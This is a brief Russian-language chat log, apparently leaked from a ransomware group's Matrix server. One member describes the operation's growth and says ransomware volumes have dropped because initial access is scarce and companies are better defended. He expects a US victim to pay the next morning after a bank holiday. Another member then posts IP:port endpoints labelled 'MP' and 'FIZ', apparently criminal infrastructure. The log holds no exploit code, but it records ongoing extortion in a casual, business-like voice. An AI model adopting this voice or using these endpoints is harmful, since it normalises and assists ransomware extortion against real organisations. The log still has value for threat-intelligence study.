[2024-05-27 21:37:02] @nickolas:talks.icu: все будет работать, мы же дорабатываем каждый день что-то.
--------------------
[2024-05-27 21:37:12] @nickolas:talks.icu: опыта больше и больше )
--------------------
[2024-05-27 21:37:13] @usernamegg:matrix.bestflowers247.online: они вахуя будут конечно
--------------------
[2024-05-27 21:37:28] @nickolas:talks.icu: это ты прикинь за полтора месяца вот так организовалось )
--------------------
[2024-05-27 21:37:52] @nickolas:talks.icu: я точки хотел делать еще в 21 году, но тогда был спам, и всем было несколько плевать )))
--------------------
[2024-05-27 21:38:06] @nickolas:talks.icu: а щас ситуация изменилась, и все зашевелилось
--------------------
[2024-05-27 21:38:53] @usernamegg:matrix.bestflowers247.online: ну конечно, всему свое время )
--------------------
[2024-05-27 21:39:12] @nickolas:talks.icu: да протсо векторов уже нормальных не осталось
--------------------
[2024-05-27 21:39:50] @nickolas:talks.icu: почему объемов по рансому стало меньше, потому что первичных доступов нет нормальных на рынке
--------------------
[2024-05-27 21:40:27] @nickolas:talks.icu: плюс компании стали намного подготовленнее, школьников выпнули с рынка.
--------------------
[2024-05-27 21:43:36] @nickolas:talks.icu: завтра с утречка по юс заплатят думаю
--------------------
[2024-05-27 21:43:44] @nickolas:talks.icu: сегодня холлидей, банк трансфер не сделать
--------------------
[2024-05-27 21:48:02] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 22:10:09] @usernamett:matrix.bestflowers247.online: ```
MP

5.61.61.64:38741
5.61.61.64:45209
```
--------------------
[2024-05-27 22:24:02] @usernamett:matrix.bestflowers247.online: 5.61.61.64:41581  FIZ
--------------------
